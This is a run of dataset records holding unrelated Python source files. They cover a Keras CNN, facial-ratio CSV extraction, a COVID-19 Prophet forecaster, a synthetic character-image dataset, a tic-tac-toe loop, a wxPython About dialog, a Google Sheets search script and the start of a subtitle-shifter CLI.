#run_metadata=p_mtd\n )\n else:\n model.compile(loss='categorical_crossentropy',\n optimizer=opt,\n metrics=['accuracy'],\n #options=p_opt, \n #run_metadata=p_mtd\n )\n\n return (model,parallel_model)\n\n def _build_architecture(self,input_shape,training,feature,preload=True,ensemble=False):\n \n model = Sequential()\n model.add(Convolution2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape))\n model.add(Convolution2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(self._ds.nclasses, activation='softmax'))\n\n return model\n\n\nclass SmallNet(SNet):\n \"\"\"\n Bayesian model for the KNet\n \"\"\"\n def __init__(self,config,ds):\n super(SmallNet,self).__init__(config=config,ds=ds,name = \"SmallNet\")\n\n\n def _build_architecture(self,input_shape,training,feature,preload=True,ensemble=False):\n if hasattr(self,'data_size'):\n weight_decay = 2.5/float(self.data_size)\n if self._config.verbose > 1:\n print(\"Setting weight decay to: {0}\".format(weight_decay))\n else:\n weight_decay = 0.01\n \n inp = Input(shape=input_shape)\n\n #Block 1\n x = Convolution2D(32, (4, 4),input_shape=input_shape,\n strides=1,\n padding='valid',\n name='block1_conv1')(inp)\n x = Activation('relu')(x)\n\n x = Convolution2D(32, (4, 4),\n strides=1,\n padding='valid',\n name='block1_conv2')(x)\n x = Activation('relu')(x)\n x = MaxPooling2D(pool_size=(2, 2),strides=2)(x)\n x = Dropout(0.25)(x,training=training)\n\n #Block 2\n x = Convolution2D(64, (4, 4),\n strides=1,\n padding='valid',\n name='block2_conv1')(x)\n x = Activation('relu')(x)\n\n x = Convolution2D(64, (4, 4),\n strides=1,\n padding='valid',\n name='block2_conv2')(x)\n x = Activation('relu')(x)\n x = MaxPooling2D(pool_size=(2, 2),strides=2)(x)\n x = Dropout(0.25)(x,training=training)\n\n #Feature blocl\n x = Convolution2D(1536, 1,\n strides=1,\n padding='valid')(x)\n x = GlobalAveragePooling2D(name='feature')(x)\n \n #x = Flatten()(x)\n x = Dense(128,kernel_regularizer=regularizers.l2(weight_decay))(x)\n x = Dropout(0.5)(x,training=training)\n x = Dense(self._ds.nclasses)(x)\n output = Activation('softmax')(x)\n\n body = 
Model(inp,output,name=self.name)\n \n if ensemble:\n return (body,inp)\n else:\n return body\n \n","sub_path":"Models/ALTransf/Transfnet.py","file_name":"Transfnet.py","file_ext":"py","file_size_in_byte":7385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"34951316","text":"import sys, os, math, csv\n\naRatios = []\n\ndef DistForm( c, a, b ): #Formula for distance between two points, also makes data numeric\n\treturn math.sqrt(((float(c[a][0])-float(c[b][0]))**2)+((float(c[a][1])-float(c[b][1]))**2))\n\ndef RatioCalc( data ):\t\n\tc = {0:[],1:[],2:[],3:[],4:[],5:[],6:[],7:[],8:[],9:[],10:[],\n\t11:[],12:[],13:[],14:[],15:[],16:[],17:[],18:[],19:[],20:[],21:[]} #Holds the 22 points in an x,y format\n\n\tfor point, key in zip(data, c):\n\t\tc[key] = point.split(\" \")\n\n\tratioList = []\n\t#Eye Length Ratio\n\tratioList.append( (DistForm(c, 9, 10) +\n\t\t\t\t\t\tDistForm(c, 11, 12)) /\n\t\t\t\t\t\tDistForm(c, 8, 13) )\n\t#Eye Distance Ratio\n\tratioList.append( DistForm(c, 0, 1)/\n\t\t\t\t\t\tDistForm(c, 8, 13) )\n\t#Nose Ratio\n\tratioList.append( DistForm(c, 15, 16)/\n\t\t\t\t\t\tDistForm(c, 20, 21) )\n\t#Lip Size Ratio\n\tratioList.append( DistForm(c, 2, 3)/\n\t\t\t\t\t\tDistForm(c, 17, 18) )\n\t#Lip Length Ratio\n\tratioList.append( DistForm(c, 2, 3)/\n\t\t\t\t\t\tDistForm(c, 20, 21) )\n\t#Eye Brow Length Ratio\n\tif DistForm(c, 4, 5) < DistForm(c, 6, 7):\n\t\tratioList.append( DistForm(c, 6, 7)/\n\t\t\t\t\t\tDistForm(c, 8, 13) )\n\telse:\n\t\tratioList.append( DistForm(c, 4, 5)/\n\t\t\t\t\t\tDistForm(c, 8, 13) )\n\t#Aggressive Ratio\n\tratioList.append( DistForm(c, 10, 19)/\n\t\t\t\t\t\tDistForm(c, 20, 21) )\n\n\treturn ratioList\n\ndef DataPusher( root, person, inFiles ):\n\tfor file in inFiles:\n\t\tif '-01' in file or '-02' in file or '-03' in file:\n\t\t\ttext_file = open(root + person + file)\n\t\t\tlines = text_file.read().splitlines()\n\t\t\tlines = lines[3:25]\n\t\t\tratios = RatioCalc(lines)\n\t\t\tif 'm-' in file:\n\t\t\t\tif '-01' in file:\n\t\t\t\t\tratios.insert(0,'neutral')\n\t\t\t\t\tratios.insert(0,'male')\n\t\t\t\telif '-02' in file:\n\t\t\t\t\tratios.insert(0,'smiling')\n\t\t\t\t\tratios.insert(0,'male')\n\t\t\t\telif '-03' in file:\n\t\t\t\t\tratios.insert(0,'anger')\n\t\t\t\t\tratios.insert(0,'male')\n\t\t\telif 'w-' in file:\n\t\t\t\tif '-01' in file:\n\t\t\t\t\tratios.insert(0,'neutral')\n\t\t\t\t\tratios.insert(0,'female')\n\t\t\t\telif '-02' in file:\n\t\t\t\t\tratios.insert(0,'smiling')\n\t\t\t\t\tratios.insert(0,'female')\n\t\t\t\telif '-03' in file:\n\t\t\t\t\tratios.insert(0,'anger')\n\t\t\t\t\tratios.insert(0,'female')\n\t\t\taRatios.append(ratios)\n\n\nif len(sys.argv) == 1: #Either inline or post location of the data directory\n\tdataDir = input(\"Enter the name of the directory containing the data: \") + '/'\n\tcsvFile = input(\"Name of the output file: \")\nelse:\n\tdataDir = sys.argv[1] + '/'\n\tcsvFile = sys.argv[2]\n\nif csv[-4:] != '.csv':\n\tcsvFile = csvFile + '.csv'\n\ninDir = os.listdir(dataDir) # Get a list of inner directories\ninDir = [x for x in inDir if not 'pts' in x]\n\nfor directory in inDir:\n\tdirectory = directory + '/'\n\tinFiles = os.listdir(dataDir + directory)\n\tDataPusher(dataDir, directory, inFiles)\n\naRatios.insert(0, ['Sex', 'Expression', 'R1', 'R2', 'R3', 'R4', 'R5', 'R6', 'R7']) #Header for csv\n\nwith open(csvFile, 'w', newline='') as f:\n\twriter = csv.writer(f)\n\twriter.writerows(aRatios)\n\nprint('CSV Made') #On completion\n\nimport 
Analyser","sub_path":"CSVMaker.py","file_name":"CSVMaker.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"111261644","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[18]:\n\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 14 20:38:54 2020\n\n@author: Onkar, Chaitanya, Prashant\n\"\"\"\n\nimport pycountry\nimport datetime\nimport pandas as pd\nfrom datetime import date\nfrom functools import reduce\n\nimport plotly.express as px\nfrom fbprophet import Prophet\n\n\n# In[19]:\n\n\n\ndef getDaysTillToday(today):\n date_time_obj = datetime.datetime.strptime(today, '%m/%d/%Y')\n today = date.today()\n delta = today - date_time_obj.date()\n return delta.days\n\n\ndef readData(data, case_type):\n # data.head()\n dataset = data.groupby(['ObservationDate']).sum()\n observationDates = dataset.index.values.tolist()\n cases = dataset[case_type].tolist()\n\n dataset = pd.DataFrame()\n dataset.insert(0, \"ds\", observationDates, True)\n dataset.insert(1, \"y\", cases, True)\n\n return dataset\n\n\n# In[20]:\n\n\n\ndef trainModel(dataset, prophet):\n prophet.fit(dataset)\n future = prophet.make_future_dataframe(periods=days)\n forecast = prophet.predict(future)\n return forecast\n \n\n\n# In[21]:\n\n\n\ndef getCountryMap():\n\n countries = list(pycountry.countries)\n Country_Codes = []\n \n for each_country in range(len(countries)):\n n = [countries[each_country].name, countries[each_country].alpha_3]\n Country_Codes.append(n)\n \n Country_Codes = pd.DataFrame(Country_Codes)\n Country_Codes.drop_duplicates()\n Country_Codes.columns = [\"Country\", \"ISO_Code\"]\n Country_Codes.set_index('Country', inplace=True)\n \n country_map = Country_Codes.to_dict('index')\n return country_map\n\n\ndef addCountryCode(data):\n Country_Region = data['Country/Region']\n ISO_Code = []\n \n for each_country in Country_Region:\n try:\n ISO_Code.append(country_map[each_country]['ISO_Code'])\n except:\n ISO_Code.append(each_country)\n\n exceptions = {'Macau': 'MAC', 'South Korea': 'KOR', 'Ivory Coast': 'CIV', \n 'Others': 'Others', 'North Ireland': 'GBR', 'Republic of Ireland': 'IRL',\n 'St. Martin': 'MAF', 'occupied Palestinian territory': 'PSE',\n \"('St. 
Martin',)\": 'MAF', 'Channel Islands': 'GBR', 'Gambia, The': 'GMB',\n 'Congo (Kinshasa)': 'COD', 'Congo (Brazzaville)': 'COD', 'Bahamas, The': 'BHS',\n 'Cape Verde': 'CPV', 'East Timor': 'TLS', 'Laos': 'LAO',\n 'Diamond Princess': 'Others', 'West Bank and Gaza': 'TKM', 'MS Zaandam': 'Others',\n 'Taiwan':'TWN', 'Vietnam':'VNM', 'Russia':'RUS', 'Others':'Others',\n 'Iran':'IRN', 'Azerbaijan':'AZE', 'Czech Republic':'CZE',\n 'Saint Barthelemy':'BLM', 'Palestine':\"PSE\", 'Vatican City':'VAT', \n 'Moldova':'MDA', 'Brunei':'BRN', 'Holy See':'VAT', 'Bolivia':'BOL', \n 'Reunion':'REU', 'Venezuela':'VEN', 'Curacao':'CUW', 'Kosovo':'RKS',\n 'Republic of the Congo':'COG', 'Tanzania':'TZA', 'The Bahamas':'BHS', \n 'The Gambia':'GMB', 'Syria':'SYR', ' Azerbaijan':'AZE'\n }\n\n for x in range(len(ISO_Code)):\n if ISO_Code[x] in exceptions.keys():\n ISO_Code[x] = exceptions[ISO_Code[x]]\n \n data[\"ISO_Code\"] = ISO_Code\n return data\n\n\ndef getTopCountries(cap):\n \n USA = data.loc[data['ISO_Code'] == 'USA']\n for x in range(1, (len(Top_Country_Codes)-(34-cap))):\n USA = USA.append(data.loc[data['ISO_Code'] == Top_Country_Codes[x]])\n \n return USA\n\n\n# In[22]:\n\n\n\ndef plotMap(dataset, isPred):\n if isPred:\n text = \"Corona Virus Prediction\"\n else:\n text = 'Corona Virus Spread in The World'\n\n df_plot = dataset.groupby('ISO_Code').max().reset_index()\n fig = px.choropleth(df_plot, locations=\"ISO_Code\",\n color=\"Confirmed\",\n hover_data=[\"Confirmed\", \"Deaths\", \"Recovered\"],\n color_continuous_scale=\"Viridis\")\n fig.update_geos(fitbounds=\"locations\", visible=True)\n fig.update_layout(margin={\"r\":0,\"t\":0,\"l\":0,\"b\":0}, title_text = text)\n return fig\n\n\ndef plotTopCountries(cap):\n topCountries = getTopCountries(cap)\n put_text = \"Prediction for Top {} Countries\".format(cap)\n fig = px.line(topCountries, x=\"ObservationDate\", y=\"Confirmed\", color='ISO_Code', hover_data=['Recovered', 'Deaths'])\n annotations = []\n annotations.append(dict(xref='paper', yref='paper', x=0.0, y=1.05,\n xanchor='left', yanchor='bottom',\n text=put_text,\n font=dict(family='Arial', size=30,\n color='rgb(37,37,37)'), showarrow=False))\n\n fig.update_layout(annotations=annotations)\n fig.show()\n\n\n# In[23]:\n\n\n\ndef predictTopCountries(cap):\n predictionsForAllCountries = []\n\n for country in range(len(Top_Country_Codes)-(34-cap)):\n\n country_data = data[data['ISO_Code']==Top_Country_Codes[country]]\n\n country_confirmed = readData(country_data, 'Confirmed')\n country_recovered = readData(country_data, 'Recovered')\n country_deaths = readData(country_data, 'Deaths')\n\n model = Prophet(yearly_seasonality=True, daily_seasonality=True)\n country_confirmed_forecast = trainModel(country_confirmed, model)\n\n country_confirmed_forecast = country_confirmed_forecast[[\"ds\",\"yhat\"]]\n country_confirmed_forecast = country_confirmed_forecast.rename(columns = {'yhat':'Confirmed'})\n\n model = Prophet(yearly_seasonality=True, daily_seasonality=True)\n country_recovered_forecast = trainModel(country_recovered, model)\n\n country_recovered_forecast = country_recovered_forecast[[\"ds\",\"yhat\"]]\n country_recovered_forecast = country_recovered_forecast.rename(columns = {'yhat':'Recovered'})\n\n model = Prophet(yearly_seasonality=True, daily_seasonality=True)\n country_deaths_forecast = trainModel(country_deaths, model)\n\n country_deaths_forecast = country_deaths_forecast[[\"ds\",\"yhat\"]]\n country_deaths_forecast = country_deaths_forecast.rename(columns = {'yhat':'Deaths'})\n\n 
predictedDataset = []\n predictedDataset.append(country_confirmed_forecast)\n predictedDataset.append(country_deaths_forecast)\n predictedDataset.append(country_recovered_forecast)\n\n predictedDataset = reduce(lambda left,right: pd.merge(left,right,on='ds'), predictedDataset)\n predictedDataset[\"ISO_Code\"] = Top_Country_Codes[country]\n predictedDataset[\"Country/Region\"] = Top_Country_Names[country]\n\n predictionsForAllCountries.append(predictedDataset)\n\n return predictionsForAllCountries\n\n\n# In[24]:\n\n\n\nTop_Country_Codes = ['USA','ESP','RUS','GBR','ITA','BRA',\n 'FRA','DEU','TUR','IRN','CHN', 'IND', \n 'PER', 'CAN', 'BEL', 'SAU', 'NLD', 'MEX', \n 'CHL', 'PAK', 'ECU', 'CHE', 'SWE', 'PRT', \n 'QAT', 'BLR', 'SGP', 'IRL', 'ARE', 'BGD',\n 'POL', 'UKR', 'JPN']\n\nTop_Country_Names = ['United States','Spain','Russia', 'UK', 'Italy',\n 'Brazil','France','Germany','Turkey', 'Iran', 'China',\n 'India','Peru','Canada','Belgium','Saudi Arabia',\n 'Netherlands','Mexico','Chile','Pakistan','Ecuador',\n 'Switzerland','Sweden','Portugal','Qatar','Belarus',\n 'Singapore','Ireland','United Arab Emirates',\n 'Bangladesh','Poland','Ukraine','Japan']\n\n\n# In[25]:\n\n\n\ndata = pd.read_csv(\"./novel-corona-virus-2019-dataset/covid_19_data.csv\")\n\ntoday = data['ObservationDate'].unique().max()\ndays = getDaysTillToday(today)\n\n\n# In[26]:\n\n\n\ncountry_map = getCountryMap()\ndata.replace({'Country/Region': 'Mainland China'}, 'China', inplace=True)\ndata.replace({'Country/Region': 'US'}, 'USA', inplace=True)\ndata.replace({'Country/Region': 'Burma'}, 'Myanmar', inplace=True)\n\ndata = addCountryCode(data)\n\ndata.head()\n\n\n# In[27]:\n\n\n\nfig = plotMap(data, False)\nfig.show()\n\n\n# In[11]:\n\n\n\nprophet = Prophet(yearly_seasonality=True, daily_seasonality=True)\n\nconfirmed_cases = readData(data, 'Confirmed')\nconfirmed_forecast = trainModel(confirmed_cases, prophet)\nfig_confirmed = prophet.plot(confirmed_forecast, xlabel=\"Date\", ylabel=\"Number of Confirmed cases worldwide\")\n\n\n# In[28]:\n\n\n\nprophet = Prophet(yearly_seasonality=True, daily_seasonality=True)\n\ndeath_cases = readData(data, 'Deaths')\ndeath_forecast = trainModel(death_cases, prophet)\nfig_death = prophet.plot(death_forecast, xlabel=\"Date\", ylabel=\"Number of deaths worldwide\")\n\n\n# In[29]:\n\n\n\nprophet = Prophet(yearly_seasonality=True, daily_seasonality=True)\n\nrecovered_cases = readData(data, 'Recovered')\nrecovered_forecast = trainModel(recovered_cases, prophet)\nfig_recovered = prophet.plot(recovered_forecast, xlabel=\"Date\", ylabel=\"Number of recoveries worldwide\")\n\n\n# In[14]:\n\n\n\npredictionsForTopCountries = predictTopCountries(5)\n\ntopCountries = pd.concat(predictionsForTopCountries)\n\nfig = plotMap(topCountries, True)\nfig.show()\n\n\n# In[16]:\n\n\nplotTopCountries(5)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"COVID 19 Predictor/Covid19_prodictor.py","file_name":"Covid19_prodictor.py","file_ext":"py","file_size_in_byte":9098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179372101","text":"import numpy as np\nimport torch\nfrom PIL import Image, ImageDraw, ImageFont, ImageOps\nimport random\nimport os\nfrom torch import nn\nimport cv2\n\n\ndef get_pic_with_text(text\n\n , background\n , mask\n , fontsize=100\n , offset=(0, 0)\n , rotate=0\n , font=None\n ):\n # set parameter\n w = int(fontsize * 0.6)\n h = int(fontsize)\n x, y = offset\n center = [int(x + w / 2), int(y + h / 2)]\n patch_center = int(w / 2), int(h / 2)\n\n bw, bh = 
background.shape[:2]\n mw, mh = mask.shape[:2]\n scale_w, scale_h = 1.0 * bw / mw, 1.0 * bh / mh\n\n # initial initmage\n img = Image.fromarray(background)\n draw = ImageDraw.Draw(img)\n\n # draw patch\n patch = Image.new('L', (w, h))\n d = ImageDraw.Draw(patch)\n d.text((0, 0), text, font=font, fill=255)\n\n patch = patch.rotate(rotate, expand=1, center=patch_center)\n w, h = patch.size\n center = [int((x + w / 2) // scale_w), int((y + h / 2) // scale_h)]\n img.paste(ImageOps.colorize(patch, (0, 0, 0), (255, 255, 255)), offset, patch)\n\n ry, rx = int(patch.size[0] // 2 // scale_h), int(patch.size[1] // 2 // scale_w)\n radius = (ry, rx)\n\n mask_patch = get_mask((ry, rx))\n _mask = np.maximum(mask[center[1] - radius[1]:center[1] + radius[1], center[0] - radius[0]:center[0] + radius[0]],\n mask_patch)\n mask[center[1] - rx:center[1] + rx, center[0] - ry:center[0] + ry] = _mask\n\n return np.asarray(img, dtype=np.uint8), mask, center, (w, h)\n\n\ndef random_position(image_size, fontsize):\n mx, my = image_size\n w = int(fontsize * 0.6)\n h = int(fontsize)\n min_x, min_y = 0, 0\n max_x, max_y = mx - w * 1.8, my - h * 1.8\n return random.randint(min_x, max_x), random.randint(min_y, max_y)\n\n\ndef random_char(char_set):\n return random.choice(char_set)\n\n\ndef get_mask(radius, scale=1):\n rx, ry = radius\n X = np.linspace(-rx, rx, 2 * rx)\n Y = np.linspace(-ry, ry, 2 * ry)\n X, Y = np.meshgrid(X, Y)\n\n # Mean vector and covariance matrix\n mu = np.array([0., 0.])\n Sigma = np.array([[scale * rx, 0], [0, scale * ry]])\n pos = np.empty(X.shape + (2,))\n pos[:, :, 0] = X\n pos[:, :, 1] = Y\n\n def multivariate_gaussian(pos, mu, Sigma):\n n = mu.shape[0]\n Sigma_det = np.linalg.det(Sigma)\n Sigma_inv = np.linalg.inv(Sigma)\n N = np.sqrt((2 * np.pi) ** n * Sigma_det)\n\n # This einsum call calculates (x-mu)T.Sigma-1.(x-mu) in a vectorized\n # way across all the input variables.\n fac = np.einsum('...k,kl,...l->...', pos - mu, Sigma_inv, pos - mu)\n\n return np.exp(-fac / 2) / N\n\n # The distribution on the variables X, Y packed into pos.\n Z = multivariate_gaussian(pos, mu, Sigma)\n Z = Z / np.max(Z)\n return Z\n\n\ndef generate_pic(\n charSet\n , rotate\n , size\n , fontsize\n , font\n , num_char_per_pic=10\n , inv_mask_scale=4\n\n):\n w, h = size[:2]\n img = np.ones(size, dtype=np.uint8) * 0\n mask = np.zeros((w // inv_mask_scale, h // inv_mask_scale, len(charSet)))\n center_list = []\n char_list = []\n wh_list = []\n for i, c in enumerate(charSet):\n whs = []\n center_clz = []\n for _ in range(num_char_per_pic):\n img, single_mask, center, wh = get_pic_with_text(\n text=c\n , background=img\n , mask=mask[..., i]\n , fontsize=fontsize\n , offset=random_position(size[:2], fontsize)\n , font=font\n , rotate=random.randint(rotate[0], rotate[1]))\n whs.append(wh)\n mask[..., i] = single_mask\n char_list.append(c)\n center_clz.append(center)\n\n center_list.append(center_clz)\n wh_list.append(whs)\n\n return img, mask, center_list, char_list, wh_list\n\n\n'''\nbatch = {\n,\"needle\":torch.ones(1,3,256,256).cuda()\n\"hm\": torch.ones(1,1,64,64).cuda()\n,'wh_mask': torch.ones(1,max_objects).cuda()\n,'ind': torch.ones(1,max_objects).type('torch.LongTensor').cuda()\n,'wh': torch.ones(1,max_objects,wh_dim).cuda()\n}\n'''\n\n\ndef generate_batch(\n # batch_size=1\n size=[256, 256, 3]\n , needle_size=[100, 100, 3]\n , fontsize=50\n , charSet=[\"A\", \"B\", \"C\"]\n , rotate=(-20, 20)\n , font=None\n , num_char_per_pic=3\n , inv_mask_scale=4\n , seed=None\n):\n if seed:\n random.seed(seed)\n num_clz = 
len(charSet)\n char2idx = dict(zip(charSet, range(len(charSet))))\n\n stack, hm, center_list, char_list, whs = generate_pic(charSet, rotate=rotate, fontsize=fontsize, font=font,\n size=size, num_char_per_pic=num_char_per_pic,\n inv_mask_scale=inv_mask_scale)\n needle_char = random.choice(char_list)\n needle, _, _, _, _ = generate_pic(needle_char, rotate, size=needle_size, num_char_per_pic=1, font=font,\n fontsize=fontsize)\n needle_idx = char2idx[needle_char]\n\n # wh_gt = torch.zeros([num_char_per_pic, 2,size[0],size[2]])\n # for i,(wc,wd) in enumerate(batch2[\"pos\"]):\n # wh_gt[:,wc,wd] = batch2[\"wh\"][i]\n\n pos = np.array(center_list[needle_idx])\n hm = np.array(hm[..., needle_idx], dtype=np.float32)\n return {\n \"stack\": np.array(stack, dtype=np.float32) # 在图像中查找物体 w,h,c\n , \"needle\": np.array(needle, dtype=np.float32) # 需要查找到物体图像 w,h,c\n , \"hm\": hm # 中心点热力图\n , \"wh_mask\": np.array(np.arange(num_char_per_pic)) # 类别\n , 'pos': pos # 中心点原始坐标\n , \"ind\": pos[..., 0] * hm.shape[1] + pos[..., 1] # 中心点编码坐标\n , \"wh\": np.array(whs[needle_idx], dtype=np.float32) # 宽度\n # , \"wh_gt\": wh_gt\n }\n\ndef get_font(file, size=50):\n ImageFont.truetype(file, size)\n\nimport torch.utils.data as data\n\n\nclass CTNumberDataset(data.Dataset):\n num_classes = 3\n default_resolution = [512, 512]\n mean = np.array([0.40789654, 0.44719302, 0.47026115],\n dtype=np.float32).reshape(1, 1, 3)\n std = np.array([0.28863828, 0.27408164, 0.27809835],\n dtype=np.float32).reshape(1, 1, 3)\n\n def __init__(self, start=0, length=100000, transform=None,\n size=[256, 256, 3]\n , needle_size=[100, 100, 3]\n , fontsize=50\n , charSet=[\"A\", \"B\", \"C\"]\n , rotate=(-20, 20)\n , font=None\n , num_char_per_pic=3\n , inv_mask_scale=4\n ):\n self.start = 0\n self.length = length\n self.transform = transform\n self.inputs = [\"stack\", \"needle\"]\n self.size = size\n self.needle_size = needle_size\n self.fontsize = fontsize\n self.charSet = charSet\n self.rotate = rotate\n self.font = font\n self.num_char_per_pic = num_char_per_pic\n self.inv_mask_scale = inv_mask_scale\n\n def __getitem__(self, index):\n x = generate_batch(\n size=self.size\n , needle_size=self.needle_size\n , fontsize=self.fontsize\n , charSet=self.charSet\n , rotate=self.rotate\n , font=self.font\n , num_char_per_pic=self.num_char_per_pic\n , inv_mask_scale=self.inv_mask_scale\n , seed=index + self.start)\n if self.transform is not None:\n x = self.transform(x)\n return x\n\n def __len__(self):\n return self.length\n","sub_path":"src/lib/datasets/sample/char_gen.py","file_name":"char_gen.py","file_ext":"py","file_size_in_byte":7735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"399043886","text":"import Morpion\r\nimport time\r\n\r\nm = Morpion.Morpion()\r\ntableau = m.contenu\r\n\r\nplayer = True\r\nm.print_tableau()\r\nm.contenu = ['-','-','-','-','-','-','-','-','-']\r\nwhile m.victoire == False and m.nul == False:\r\n if player == True:\r\n case = int(input('Entre la case dans laquelle tu veux jouer: '))\r\n m.coup(player,case)\r\n else:\r\n case = m.random_IA\r\n m.coup(player,case)\r\n m.print_tableau()\r\n m.verification(player)\r\n player = not player\r\n","sub_path":"Morpion/main_random.py","file_name":"main_random.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"422029089","text":"#!/usr/bin/env python\n\n'''About OpenFOAM'''\n\nimport wx\nimport wx.html\nimport cPickle\nimport 
const\n\nclass FoamFrame(wx.Frame):\n '''test frame'''\n def __init__(self, *args, **kwargs):\n self.title = \"test Frame\"\n wx.Frame.__init__(self, None, -1, self.title, *args, **kwargs)\n\n #standard frame items \n self.createMenuBar()\n\n def menuData(self):\n '''menu items data base'''\n return [\n (\"&Help\", (\n (\"About...\", \"Show about window\", self.OnAbout),\n (\"\", \"\", \"\")))]\n \n def createMenuBar(self):\n menuBar = wx.MenuBar()\n for eachMenuData in self.menuData():\n menuLabel = eachMenuData[0]\n menuItems = eachMenuData[1]\n menuBar.Append(self.createMenu(menuItems), menuLabel)\n self.SetMenuBar(menuBar)\n\n def createMenu(self, menuData):\n menu = wx.Menu()\n for eachItem in menuData:\n if len(eachItem) == 2:\n label = eachItem[0]\n subMenu = self.createMenu(eachItem[1])\n menu.AppendMenu(wx.NewId(), label, subMenu)\n else:\n self.createMenuItem(menu, *eachItem)\n return menu\n\n def createMenuItem(self, menu, label, status, handler, ID=-1, kind=wx.ITEM_NORMAL):\n if not label:\n menu.AppendSeparator()\n return\n menuItem = menu.Append(ID, label, status, kind)\n self.Bind(wx.EVT_MENU, handler, menuItem)\n\n def OnAbout(self, event):\n dlg = OpenFoamAbout(self)\n dlg.ShowModal() #show dialog box, modal means cannot do anything till press \"OK\"\n dlg.Destroy()\n\nclass OpenFoamAbout(wx.Dialog):\n \"\"\"About message\"\"\"\n text = '''\n\n\n
<html>\n<body>\n<center>\n<h1>OpenFOAM GUI!</h1>\n</center>\n<p>\nOpenFOAM GUI is a visualization program for generating\nan OpenFOAM case and running it on the bwHPC-C5 computer cluster.\n</p>\n<p>\nMore information on OpenFOAM is available at http://www.openfoam.org/\nand about the bwHPC-C5 project at http://www.bwhpc-c5.de\n</p>\n</body>\n</html>
\n\n\n'''\n def __init__(self, parent):\n wx.Dialog.__init__(self, parent, -1, \"About OpenFOAM GUI\",\n size=(440, 400))\n html = wx.html.HtmlWindow(self)\n html.SetPage(self.text)\n button = wx.Button(self, wx.ID_OK, \"Okay\")\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(html, 1, wx.EXPAND|wx.ALL, const.sizerBorder)\n sizer.Add(button, 0, wx.ALIGN_CENTER|wx.ALL, const.sizerBorder)\n\n self.SetSizer(sizer)\n self.Layout()\n \n \n\nif __name__ == '__main__':\n app = wx.App(False)\n frame = FoamFrame()\n frame.Show(True)\n frame.Center(wx.BOTH)\n app.MainLoop()\n","sub_path":"aboutFoam.py","file_name":"aboutFoam.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"635240519","text":"import gspread\nimport matches\nimport argparse\n\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n# use creds to create a client to interact with the Google Drive API\nscope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive', 'https://www.googleapis.com/auth/spreadsheets']\ncreds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)\nclient = gspread.authorize(creds)\n\n#parse for the search entry\nparser = argparse.ArgumentParser(description='Input a search entry')\nparser.add_argument('searchEntry', nargs='?', help='search for name of value')\nargs = parser.parse_args()\n\n# Find a workbook by name and open the first sheet\n# Make sure you use the right name here.\nsheet = client.open(\"Sector Taxonomy\")\n\n# Select the references worksheet of the CRANE sheets\nworksheet = sheet.worksheet(\"References\")\n\n# find cell, which columns to search in?\n#searchEntry = args[0]\nsearchEntry = \"Extreme Efficiency in IT/Data Centers\"\nmatches.returnMatches(worksheet, searchEntry)\n\n\n\n","sub_path":".ipynb_checkpoints/search-checkpoint.py","file_name":"search-checkpoint.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"304406025","text":"import argparse\nimport logging\nimport os\nimport sys\nimport time\n\n# Use absolute imports to support pyinstaller\n# https://github.com/pyinstaller/pyinstaller/issues/2560\nfrom sushi import run, VERSION\nfrom sushi.common import SushiError\n\nif sys.platform == 'win32':\n try:\n import colorama\n colorama.init()\n console_colors_supported = True\n except ImportError:\n console_colors_supported = False\nelse:\n console_colors_supported = True\n\n\nclass ColoredLogFormatter(logging.Formatter):\n bold_code = \"\\033[1m\"\n reset_code = \"\\033[0m\"\n grey_code = \"\\033[30m\\033[1m\"\n\n error_format = \"{bold}ERROR: %(message)s{reset}\".format(bold=bold_code, reset=reset_code)\n warn_format = \"{bold}WARNING: %(message)s{reset}\".format(bold=bold_code, reset=reset_code)\n debug_format = \"{grey}%(message)s{reset}\".format(grey=grey_code, reset=reset_code)\n default_format = \"%(message)s\"\n\n def format(self, record):\n if record.levelno == logging.DEBUG:\n self._fmt = self.debug_format\n elif record.levelno == logging.WARN:\n self._fmt = self.warn_format\n elif record.levelno == logging.ERROR or record.levelno == logging.CRITICAL:\n self._fmt = self.error_format\n else:\n self._fmt = self.default_format\n\n return super(ColoredLogFormatter, self).format(record)\n\n\ndef create_arg_parser():\n parser = argparse.ArgumentParser(description='Sushi - Automatic Subtitle Shifter')\n\n 
parser.add_argument('--window', default=10, type=int, metavar='', dest='window',\n help='Search window size. [%(default)s]')\n parser.add_argument('--max-window', default=30, type=int, metavar='', dest='max_window',\n help=\"Maximum search size Sushi is allowed to use when trying to recover from errors. [%(default)s]\")\n parser.add_argument('--rewind-thresh', default=5, type=int, metavar='', dest='rewind_thresh',\n help=\"Number of consecutive errors Sushi has to encounter to consider results broken \"\n \"and retry with larger window. Set to 0 to disable. [%(default)s]\")\n parser.add_argument('--no-grouping', action='store_false', dest='grouping',\n help=\"Don't events into groups before shifting. Also disables error recovery.\")\n parser.add_argument('--max-kf-distance', default=2, type=float, metavar='', dest='max_kf_distance',\n help='Maximum keyframe snapping distance. [%(default)s]')\n parser.add_argument('--kf-mode', default='all', choices=['shift', 'snap', 'all'], dest='kf_mode',\n help='Keyframes-based shift correction/snapping mode. [%(default)s]')\n parser.add_argument('--smooth-radius', default=3, type=int, metavar='', 